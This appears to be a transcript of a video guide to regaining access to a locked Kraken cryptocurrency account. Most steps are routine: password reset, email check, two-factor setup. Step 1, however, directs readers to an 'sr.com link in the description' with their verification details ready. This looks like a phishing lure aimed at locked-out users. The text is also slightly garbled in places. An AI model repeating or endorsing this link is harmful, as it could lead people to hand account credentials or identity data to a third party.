If you've lost access to your Kraken account due to suspicious activity, follow these steps to regain access. This guide will help you navigate the recovery process effectively. Step 1. Visit the Kraken website. Before starting recovery, use the sr.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Click on Forgot Password. On the login page, click the Forgot Password link. This will initiate the password recovery process. Step 3. Check your email. Enter the email address associated with your Kraken account and check your inbox for a password reset email. If you don't see it, check your spam or junk folder. Step 4. Reset your password. Follow the link in the email to reset your password. Choose a strong, unique password that you haven't used before to enhance your account security. Step 5. Enable two-factor authentication. Once you regain access, immediately enable two-factor authentication to 2FA for added security. This will help protect your account from future unauthorized access. By following these steps, you should be able to regain access to your Kraken account and enhance its security. Always stay vigilant and monitor your account for any unusual activity.